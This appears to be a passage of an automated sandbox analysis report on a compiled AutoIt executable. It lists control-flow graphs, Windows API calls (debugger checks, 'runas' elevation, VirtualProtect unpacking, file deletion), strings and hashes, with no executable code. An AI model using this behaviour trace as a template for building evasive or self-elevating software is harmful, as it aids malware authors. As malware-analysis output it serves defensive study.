library calls 100702->100758 100704 c7e5a8 100704->100663 100706 cb3ece 100706->100706 100708 c7e835 100707->100708 100709 cb3ed3 100708->100709 100712 c7e89f 100708->100712 100721 c7e8f9 100708->100721 100710 c7a000 330 API calls 100709->100710 100711 cb3ee8 100710->100711 100726 c7ead0 Mailbox 100711->100726 100761 cda0b5 89 API calls 4 library calls 100711->100761 100714 c777c7 59 API calls 100712->100714 100712->100721 100713 c777c7 59 API calls 100713->100721 100716 cb3f2e 100714->100716 100718 c92f80 __cinit 67 API calls 100716->100718 100717 c92f80 __cinit 67 API calls 100717->100721 100718->100721 100719 cb3f50 100719->100663 100720 c78620 69 API calls 100720->100726 100721->100713 100721->100717 100721->100719 100725 c7eaba 100721->100725 100721->100726 100723 c7f2f5 100766 cda0b5 89 API calls 4 
library calls 100723->100766 100724 cda0b5 89 API calls 100724->100726 100725->100726 100762 cda0b5 89 API calls 4 library calls 100725->100762 100726->100720 100726->100723 100726->100724 100727 c7a000 330 API calls 100726->100727 100730 c79df0 Mailbox 59 API calls 100726->100730 100732 c78ea0 59 API calls 100726->100732 100737 c7ebd8 100726->100737 100760 c780d7 59 API calls 2 library calls 100726->100760 100763 cc7405 59 API calls 100726->100763 100764 cec8d7 330 API calls 100726->100764 100765 ceb851 330 API calls Mailbox 100726->100765 100767 ce96db 330 API calls Mailbox 100726->100767 100727->100726 100730->100726 100731 cb424f 100731->100663 100732->100726 100737->100663 100738->100663 100739->100603 100740->100609 100741->100663 100742->100611 100743->100611 100744->100611 100745->100663 100746->100663 100747->100663 100748->100663 100749->100663 100750->100663 100751->100660 100752->100660 100753->100660 100754->100660 100755->100660 100756->100660 100757->100660 100758->100704 100759->100706 100760->100726 100761->100726 100762->100726 100763->100726 100764->100726 100765->100726 100766->100731 100767->100726 100768->99537 100769->99535 100770->99300 100771 cb0226 100777 c7ade2 Mailbox 100771->100777 100773 cb0c86 100851 cc66f4 59 API calls Mailbox 100773->100851 100775 cb0c8f 100776 c79df0 Mailbox 59 API calls 100776->100777 100777->100773 100777->100775 100777->100776 100778 cb00e0 VariantClear 100777->100778 100779 c7b6c1 100777->100779 100781 ce474d 330 API calls 100777->100781 100785 cee237 100777->100785 100788 cee24b 100777->100788 100791 ce83a8 100777->100791 100849 cc7405 59 API calls 100777->100849 100778->100777 100850 cda0b5 89 API calls 4 library calls 100779->100850 100781->100777 100852 cecdf1 100785->100852 100787 cee247 100787->100777 100789 cecdf1 130 API calls 100788->100789 100790 cee25b 100789->100790 100790->100777 100962 c79a20 100791->100962 100793 ce83ca CoInitialize 100794 ce83e9 VariantInit 100793->100794 100795 ce83e3 
100793->100795 100796 ce8605 100794->100796 100797 ce8411 100794->100797 100795->100794 100800 c90ff6 Mailbox 59 API calls 100796->100800 100798 ce8418 100797->100798 100799 ce85e4 100797->100799 100802 ce841b 100798->100802 100803 ce8487 100798->100803 100801 c79997 84 API calls 100799->100801 100804 ce8616 100800->100804 100805 ce85f1 100801->100805 100806 ce86ba VariantClear 100802->100806 100809 c79997 84 API calls 100802->100809 100811 ce849e 100803->100811 100812 ce859d 100803->100812 100807 ce8639 100804->100807 100810 c79997 84 API calls 100804->100810 100808 c79997 84 API calls 100805->100808 100806->100777 100831 ce855b 100807->100831 100979 cd7804 105 API calls Mailbox 100807->100979 100808->100796 100813 ce842f 100809->100813 100814 ce8629 100810->100814 100974 c79c9c 59 API calls 100811->100974 100819 c79997 84 API calls 100812->100819 100818 c79997 84 API calls 100813->100818 100964 ccda5d 100814->100964 100821 ce8445 100818->100821 100822 ce85a2 100819->100822 100820 ce84a3 100823 ce84c7 100820->100823 100975 c79c9c 59 API calls 100820->100975 100824 c79997 84 API calls 100821->100824 100825 c79997 84 API calls 100822->100825 100830 c90ff6 Mailbox 59 API calls 100823->100830 100827 ce8457 100824->100827 100828 ce85b4 100825->100828 100833 c79997 84 API calls 100827->100833 100829 c79997 84 API calls 100828->100829 100834 ce85c8 100829->100834 100841 ce84ed 100830->100841 100831->100806 100980 ce96db 330 API calls Mailbox 100831->100980 100832 ce84b8 100832->100823 100976 c79c9c 59 API calls 100832->100976 100836 ce846b 100833->100836 100978 ce9a72 337 API calls 3 library calls 100834->100978 100973 ce9a72 337 API calls 3 library calls 100836->100973 100840 ce8482 100840->100806 100843 ce8509 100841->100843 100844 c79997 84 API calls 100841->100844 100848 ce8538 100841->100848 100845 c79997 84 API calls 100843->100845 100844->100843 100846 ce8525 100845->100846 100847 ccda5d 8 API calls 100846->100847 100847->100848 100848->100831 100977 cd7804 105 
[Control-flow graph node/edge listing (rendered graph data from the previous function's graph, ending at c772c5) omitted]

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C73B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00C73B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D362F8,00D362E0,?,?), ref: 00C73BFD
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                      • Part of subcall function 00C80A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C73C26,00D362F8,?,?,?), ref: 00C80ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C73C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D293F0,00000010), ref: 00CAD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,00D362F8,?,?,?), ref: 00CAD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D25D40,00D362F8,?,?,?), ref: 00CAD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00CAD581
                      • Part of subcall function 00C73A58: GetSysColorBrush.USER32(0000000F), ref: 00C73A62
                      • Part of subcall function 00C73A58: LoadCursorW.USER32(00000000,00007F00), ref: 00C73A71
                      • Part of subcall function 00C73A58: LoadIconW.USER32(00000063), ref: 00C73A88
                      • Part of subcall function 00C73A58: LoadIconW.USER32(000000A4), ref: 00C73A9A
                      • Part of subcall function 00C73A58: LoadIconW.USER32(000000A2), ref: 00C73AAC
                      • Part of subcall function 00C73A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C73AD2
                      • Part of subcall function 00C73A58: RegisterClassExW.USER32(?), ref: 00C73B28
                      • Part of subcall function 00C739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C73A15
                      • Part of subcall function 00C739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73A36
                      • Part of subcall function 00C739E7: ShowWindow.USER32(00000000,?,?), ref: 00C73A4A
                      • Part of subcall function 00C739E7: ShowWindow.USER32(00000000,?,?), ref: 00C73A53
                      • Part of subcall function 00C743DB: _memset.LIBCMT ref: 00C74401
                      • Part of subcall function 00C743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C744A6
                    Strings
                    • This is a third-party compiled AutoIt script., xrefs: 00CAD4B4
                    • runas, xrefs: 00CAD575
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas
                    • API String ID: 529118366-3287110873
                    • Opcode ID: 74dfd5a8c0d075bfafaff01e1bee573f1c09fe079cc01007d8d228443637c686
                    • Instruction ID: 76e0d4b9cd58bf456c218b4bbd492ece64702f55ec0ba4dfb12a334d17c1daf5
                    • Opcode Fuzzy Hash: 74dfd5a8c0d075bfafaff01e1bee573f1c09fe079cc01007d8d228443637c686
                    • Instruction Fuzzy Hash: 7451F975D04289BECB11EBB4DC05EFE7B74AF05304F04C269F46AA62A1DA708646EB35

                    Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)
                    • Entry block: c73633-c73681
                    • Blocks with API calls: c736ca (NtdllDefWindowProc_W), c736f9 (KillTimer), c73715 (SetTimer, RegisterClipboardFormatW), c7373e (CreatePopupMenu), c7375d (PostQuitMessage), cad2e7 (SetFocus), cad2f8 (MoveWindow)
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00C736D2
                    • KillTimer.USER32(?,00000001), ref: 00C736FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C7371F
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C7372A
                    • CreatePopupMenu.USER32 ref: 00C7373E
                    • PostQuitMessage.USER32(00000000), ref: 00C7375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                    • String ID: TaskbarCreated
                    • API String ID: 157504867-2362178303
                    • Opcode ID: 533daa5b9c364d67613c23193ce7e40fe115e9aff8ee24829aa6e4f30f27e8de
                    • Instruction ID: 55bdaaef5454d1d46fcbbcb38ae483eb1e460e359148632b232f89eef737cdbc
                    • Opcode Fuzzy Hash: 533daa5b9c364d67613c23193ce7e40fe115e9aff8ee24829aa6e4f30f27e8de
                    • Instruction Fuzzy Hash: F041F4B2200285BBDF186B28DD49B7E3795FB45340F148129F91AC63A1CB60EE41F776

                    Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)
                    • Entry block: c74afe-c74b5e (GetVersionExW)
                    • Blocks with API calls: c74bf1 (GetCurrentProcess, IsWow64Process), c74c41 (GetNativeSystemInfo), c74c4d (FreeLibrary), c74c7d (GetSystemInfo), c74c89 (GetSystemInfo)
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00C74B2B
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • GetCurrentProcess.KERNEL32(?,00CFFAEC,00000000,00000000,?), ref: 00C74BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00C74BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C74C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00C74C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00C74C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00C74C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 61cecaedda68927a96c9c82e20c19210b038a95939c1dd6e83490a66d5ef3487
                    • Instruction ID: 95705cc008bb7523154a77baa6d00bb5eea9d9364589ba573a1491dbf99dbb9f
                    • Opcode Fuzzy Hash: 61cecaedda68927a96c9c82e20c19210b038a95939c1dd6e83490a66d5ef3487
                    • Instruction Fuzzy Hash: 9491D63154ABC4DFC735CB7894512AABFE4AF66304B44899DD0DF93A01D320EA48D72A

                    Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)
                    • Entry block: c74fe9-c74ff7
                    • Blocks with API calls: c75003 (FindResourceExW), cadd5c (LoadResource), cadd71 (SizeofResource), cadd85 (LockResource)
                    APIs
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C74EEE,?,?,00000000,00000000), ref: 00C75010
                    • LoadResource.KERNEL32(?,00000000,?,?,00C74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C74F8F), ref: 00CADD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00C74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C74F8F), ref: 00CADD75
                    • LockResource.KERNEL32(00C74EEE,?,?,00C74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C74F8F,00000000), ref: 00CADD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SCRIPT
                    • API String ID: 3473537107-3967369404
                    • Opcode ID: 112952299e90dafd827e6adbda1e658c5eea35137e3223d2ab70c86194e19710
                    • Instruction ID: a57b98436ac36c984e20d82ff379b2482ebdd8ea6b912c45ecafc3ece37225fc
                    • Opcode Fuzzy Hash: 112952299e90dafd827e6adbda1e658c5eea35137e3223d2ab70c86194e19710
                    • Instruction Fuzzy Hash: 3D115A75200701AFE7218B65DC58F6B7BB9EFC9B51F20816CF41A862A0DBA1E801C6A1

                    Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)
                    • Entry block: dbc0b0-dbc0bd
                    • Blocks with API calls: dbc1da (LoadLibraryA), dbc203 (GetProcAddress), dbc219 (ExitProcess), dbc250 (VirtualProtect, called twice)
                    APIs
                    • LoadLibraryA.KERNEL32(?), ref: 00DBC1EA
                    • GetProcAddress.KERNEL32(?,00DB5FF9), ref: 00DBC208
                    • ExitProcess.KERNEL32(?,00DB5FF9), ref: 00DBC219
                    • VirtualProtect.KERNELBASE(00C70000,00001000,00000004,?,00000000), ref: 00DBC267
                    • VirtualProtect.KERNELBASE(00C70000,00001000), ref: 00DBC27C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                    • String ID:
                    • API String ID: 1996367037-0
                    • Opcode ID: ab8aa4c398687c74529e91f016997aee44f179a03fe8a5bde44d75714b94c903
                    • Instruction ID: e53467f0d39211fcf1f3b6b5ba91adb074e540965c95abf126e3dc643561a5a1
                    • Opcode Fuzzy Hash: ab8aa4c398687c74529e91f016997aee44f179a03fe8a5bde44d75714b94c903
                    • Instruction Fuzzy Hash: 9E51E372A64352DBD7209ABCCC806E4B7A4FB5136472C1738D5E3D73C6EB9058068774
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID:
                    • API String ID: 3964851224-0
                    • Opcode ID: 42bb8d12812b916e871e38c5b5d9f2769c913c4a625defd24fefad59dbc86b4b
                    • Instruction ID: 05aeae16543033a087ccd4f87b16963ff06d003c9b3ca32b1c65772ca84018be
                    • Opcode Fuzzy Hash: 42bb8d12812b916e871e38c5b5d9f2769c913c4a625defd24fefad59dbc86b4b
                    • Instruction Fuzzy Hash: 6F928A706083418FD764DF24C484B6AB7E1BF84308F24896DF99A8B362D771ED49CB96
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00CAE7C1), ref: 00CD46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00CD46B7
                    • FindClose.KERNEL32(00000000), ref: 00CD46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 02bdcda8a747e1573cf97668be1b9950595c75cbfdfa5aea50b07e110a65a9ab
                    • Instruction ID: 4d7e048f5dd93185ff8b9df6ccfc1b3869f077b030c9b77906399594beb34b18
                    • Opcode Fuzzy Hash: 02bdcda8a747e1573cf97668be1b9950595c75cbfdfa5aea50b07e110a65a9ab
                    • Instruction Fuzzy Hash: 7EE0D8314104005B42146738EC4D5FE775CDE06335F10071AFB36C12E0E7B09955C596
                    Strings
                    • Variable must be of type 'Object'., xrefs: 00CB428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: 90d5fcd72abeaca411e5f9a522b190652d786a5467a0eed597b7bfb762030c6c
                    • Instruction ID: 7c1eb1ff51563e1e2730b8173e4957c6f91a0b796c82e5fd1e58130cabf22c6c
                    • Opcode Fuzzy Hash: 90d5fcd72abeaca411e5f9a522b190652d786a5467a0eed597b7bfb762030c6c
                    • Instruction Fuzzy Hash: 32A28076A04215CFCB24CF59C480AAEB7B1FF58310F64C1A9E91AAB352D731ED42DB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C80BBB
                    • timeGetTime.WINMM ref: 00C80E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C80FB3
                    • TranslateMessage.USER32(?), ref: 00C80FC7
                    • DispatchMessageW.USER32(?), ref: 00C80FD5
                    • Sleep.KERNEL32(0000000A), ref: 00C80FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00C8105A
                    • DestroyWindow.USER32 ref: 00C81066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C81080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00CB52AD
                    • TranslateMessage.USER32(?), ref: 00CB608A
                    • DispatchMessageW.USER32(?), ref: 00CB6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: 72c35bd73468eae8c61301f6075fdd577d1ea047d16e834da7d645ac6e6cbf08
                    • Instruction ID: 7d95d5aa03a03f14f3ec764b0193977ce47cc8e9b4b82467c18e13daa8b7bd1a
                    • Opcode Fuzzy Hash: 72c35bd73468eae8c61301f6075fdd577d1ea047d16e834da7d645ac6e6cbf08
                    • Instruction Fuzzy Hash: D3B2BD70608741DFD724DF24C884BAEB7E4FF84304F24891DE59A872A1CB71E989DB96

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00CD91E9: __time64.LIBCMT ref: 00CD91F3
                      • Part of subcall function 00C75045: _fseek.LIBCMT ref: 00C7505D
                    • __wsplitpath.LIBCMT ref: 00CD94BE
                      • Part of subcall function 00C9432E: __wsplitpath_helper.LIBCMT ref: 00C9436E
                    • _wcscpy.LIBCMT ref: 00CD94D1
                    • _wcscat.LIBCMT ref: 00CD94E4
                    • __wsplitpath.LIBCMT ref: 00CD9509
                    • _wcscat.LIBCMT ref: 00CD951F
                    • _wcscat.LIBCMT ref: 00CD9532
                      • Part of subcall function 00CD922F: _memmove.LIBCMT ref: 00CD9268
                      • Part of subcall function 00CD922F: _memmove.LIBCMT ref: 00CD9277
                    • _wcscmp.LIBCMT ref: 00CD9479
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AAE
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CD96DC
                    • _wcsncpy.LIBCMT ref: 00CD974F
                    • DeleteFileW.KERNEL32(?,?), ref: 00CD9785
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CD979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CD97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CD97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: d828b0d99df2f7dacb41a315b7d7695186dfaeba95a08357435273797be51898
                    • Instruction ID: 97aa5c837b443269ac01bed977e8ced49cbe2bbb55bd3c828bcea3fb70d63484
                    • Opcode Fuzzy Hash: d828b0d99df2f7dacb41a315b7d7695186dfaeba95a08357435273797be51898
                    • Instruction Fuzzy Hash: 86C12BB5D00229AACF21DF95CC85EEEB7BDEF45300F0040AAF609E7251EB709A459F65

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00C74864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D362F8,?,00C737C0,?), ref: 00C74882
                      • Part of subcall function 00C9074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C772C5), ref: 00C90771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C77308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CAECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CAED32
                    • RegCloseKey.ADVAPI32(?), ref: 00CAED70
                    • _wcscat.LIBCMT ref: 00CAEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
